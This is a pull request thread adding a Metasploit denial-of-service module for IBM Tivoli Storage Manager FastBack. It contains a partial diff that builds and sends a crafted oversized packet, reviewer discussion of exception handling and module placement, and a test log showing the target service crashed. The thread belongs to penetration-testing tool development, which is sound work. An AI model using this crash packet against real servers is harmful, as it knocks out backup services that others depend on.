### PR TITLE
Add IBM Tivoli Storage Manager Fastback Denial of Service module

### PR DESCRIPTION
**Pull request by wwebb-r7**
This module triggers the denial of service condition detailed at [https://www.exploit-db.com/exploits/38979/](https://www.exploit-db.com/exploits/38979/)

### CODE REVIEW

File: modules/exploits/windows/misc/ibm_tsm_dos.rb [hunk 1]
```diff
@@ -0,0 +1,96 @@
...
+    p = tv_pkt(target_opcode,
+               p1 = "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % [Rex::Text.rand_text_alpha(0x200),0,0,0,0],
+               p2 = Rex::Text.rand_text_alpha(0x60),
+               p3 = Rex::Text.rand_text_alpha(0x60)
+              )
+
+    sock.put(p)
+    disconnect
+    print_status("Packet sent!")
+  rescue ::Exception => ex
```
Comment (wchen-r7) [inline modules/exploits/windows/misc/ibm_tsm_dos.rb]: Rescuing ```::Exception``` is [not a recommended practice](http://stackoverflow.com/questions/10048173/why-is-it-bad-style-to-rescue-exception-e-in-ruby). Your module would catch things that should not be handled by it (for example, exceptions that should be handled by msfconsole). You want to be more specific :-)

I once tried to document what the Tcp mixin might raise in here, feel free to check it out:
https://github.com/rapid7/metasploit-framework/wiki/How-to-use-the-Msf%3A%3AExploit%3A%3ARemote%3A%3ATcp-mixin

**Comment by wchen-r7** [comment]
Hi @wwebb-r7, sorry we didn't make this clear. At Metasploit, all exploit modules are required to pop a shell. If it doesn't (in this case, looks like just a DoS), then you would have to move this module to the auxiliary category. In your case, probably in https://github.com/rapid7/metasploit-framework/tree/master/modules/auxiliary/dos/misc. You may browser around for code examples :-)

**Comment by wwebb-r7** [comment]
Made exception handling changes and moved module to module/auxiliary/dos/misc

**Comment by wchen-r7** [comment]
Thanks.

**Comment by wwebb-r7** [comment]
Inherit from Msf::Auxiliary

**Comment by wchen-r7** [comment]
Tested:

```
msf auxiliary(ibm_tsm_dos) > run

[*] Connected to: 172.16.23.157 port: 11460
[*] Sending malicious packet
[*] Packet sent!
[*] Auxiliary module execution completed
msf auxiliary(ibm_tsm_dos) > rerun
[*] Reloading module...

[*] Exploit failed: Rex::ConnectionRefused The connection was refused by the remote host (172.16.23.157:11460).
[*] Auxiliary module execution completed
msf auxiliary(ibm_tsm_dos) > 
```

**Comment by wchen-r7** [comment]
PR merged. Congrats! :-)

**Pull request merged**